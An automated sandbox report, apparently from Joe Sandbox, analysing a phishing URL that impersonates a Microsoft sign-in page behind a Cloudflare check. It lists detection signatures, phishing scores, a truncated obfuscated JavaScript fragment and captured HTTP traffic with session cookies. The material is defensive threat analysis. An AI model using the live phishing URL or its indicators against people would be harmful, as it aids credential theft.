Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://sanbernardinoscounty.telcom-info.com/

Overview

General Information

Sample URL:https://sanbernardinoscounty.telcom-info.com/
Analysis ID:1523738
Tags:urlscan
Infos:

Detection

HtmlDropper
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected Html Dropper
HTML page contains obfuscated javascript
Phishing site detected (based on favicon image match)
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Phishing site or detected (based on various text indicators)
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Invalid 'sign-in options' or 'sign-up' link found
Invalid T&C link found

Classification

  • System is w10x64
  • chrome.exe (PID: 4080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 4864 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2188,i,10797738705276059449,12300204305592509053,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 7144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sanbernardinoscounty.telcom-info.com/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
5.3.pages.csvJoeSecurity_HtmlDropper_3Yara detected Html DropperJoe Security
    9.4.pages.csvJoeSecurity_HtmlDropper_3Yara detected Html DropperJoe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8LLM: Score: 9 Reasons: The brand 'Microsoft' is well-known and its legitimate domain is 'microsoft.com'., The provided URL 'sanbernardinoscounty.telcom-info.com' does not match the legitimate domain 'microsoft.com'., The URL contains extra words and hyphens which are common indicators of phishing., The domain 'telcom-info.com' is not associated with Microsoft., The subdomain 'sanbernardinoscounty' is unrelated to Microsoft and adds to the suspicion. DOM: 5.3.pages.csv
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8#LLM: Score: 9 Reasons: The legitimate domain for Microsoft is microsoft.com., The provided URL (sanbernardinoscounty.telcom-info.com) does not match the legitimate domain., The URL contains extra words and hyphens which are common indicators of phishing., The domain 'telcom-info.com' is not associated with Microsoft., The subdomain 'sanbernardinoscounty' is unrelated to Microsoft and adds to the suspicion. DOM: 9.4.pages.csv
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8HTTP Parser: var a0_0x20ca42=a0_0x575f;function a0_0x1bf9(){var _0x31263c=['getAttribute','test','appendChi
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8#HTTP Parser: var a0_0x20ca42=a0_0x575f;function a0_0x1bf9(){var _0x31263c=['getAttribute','test','appendChi
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Matcher: Template: microsoft matched with high similarity
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8#Matcher: Template: microsoft matched with high similarity
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Matcher: Found strong image similarity, brand: MICROSOFT
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Matcher: Template: microsoft matched
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8#Matcher: Template: microsoft matched
      Source: Chrome DOM: 0.0OCR Text: Verifying... CLOUDFLARE Ten-rs Microsoft
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8HTTP Parser: Number of links: 0
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8#HTTP Parser: Number of links: 0
      Source: https://sanbernardinoscounty.telcom-info.com/HTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20qtFLbZ%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8HTTP Parser: Title: Authenticating... does not match URL
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8#HTTP Parser: Title: Authenticating... does not match URL
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8HTTP Parser: Invalid link: get a new Microsoft account
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8#HTTP Parser: Invalid link: get a new Microsoft account
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8HTTP Parser: Invalid link: Terms of use
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8HTTP Parser: Invalid link: Privacy & cookies
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8#HTTP Parser: Invalid link: Terms of use
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8#HTTP Parser: Invalid link: Privacy & cookies
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8HTTP Parser: No <meta name="author".. found
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8#HTTP Parser: No <meta name="author".. found
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8HTTP Parser: No <meta name="copyright".. found
      Source: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8#HTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49816 version: TLS 1.2
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /captcha/style.css HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://sanbernardinoscounty.telcom-info.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sanbernardinoscounty.telcom-info.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sanbernardinoscounty.telcom-info.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /captcha/logo.svg HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sanbernardinoscounty.telcom-info.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sanbernardinoscounty.telcom-info.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://sanbernardinoscounty.telcom-info.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cbff7d01962c33d&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /captcha/logo.svg HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cbff7d01962c33d&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1121365584:1727821582:FtjyX9VbAvqmLS5-UuL06udmIDQT7dp1rW-1y8F4S1Y/8cbff7d01962c33d/bcbf9bd71f426c2 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8cbff7d01962c33d/1727822571917/09924a35f3c758709af88e0a588b7cd2bbbe09a1e05bd9809c84033ada6e7c05/xRO-NWK2Qn8voTN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cbff7d01962c33d/1727822571920/dF8dAYCSi2ZeUfY HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cbff7d01962c33d/1727822571920/dF8dAYCSi2ZeUfY HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1121365584:1727821582:FtjyX9VbAvqmLS5-UuL06udmIDQT7dp1rW-1y8F4S1Y/8cbff7d01962c33d/bcbf9bd71f426c2 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1121365584:1727821582:FtjyX9VbAvqmLS5-UuL06udmIDQT7dp1rW-1y8F4S1Y/8cbff7d01962c33d/bcbf9bd71f426c2 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/rc/8cbff7d01962c33d HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficHTTP traffic detected: GET /em9XWWsyOWNaZkNyVjZorobotem9XWWsyOWNaZkNyVjZo HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://sanbernardinoscounty.telcom-info.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
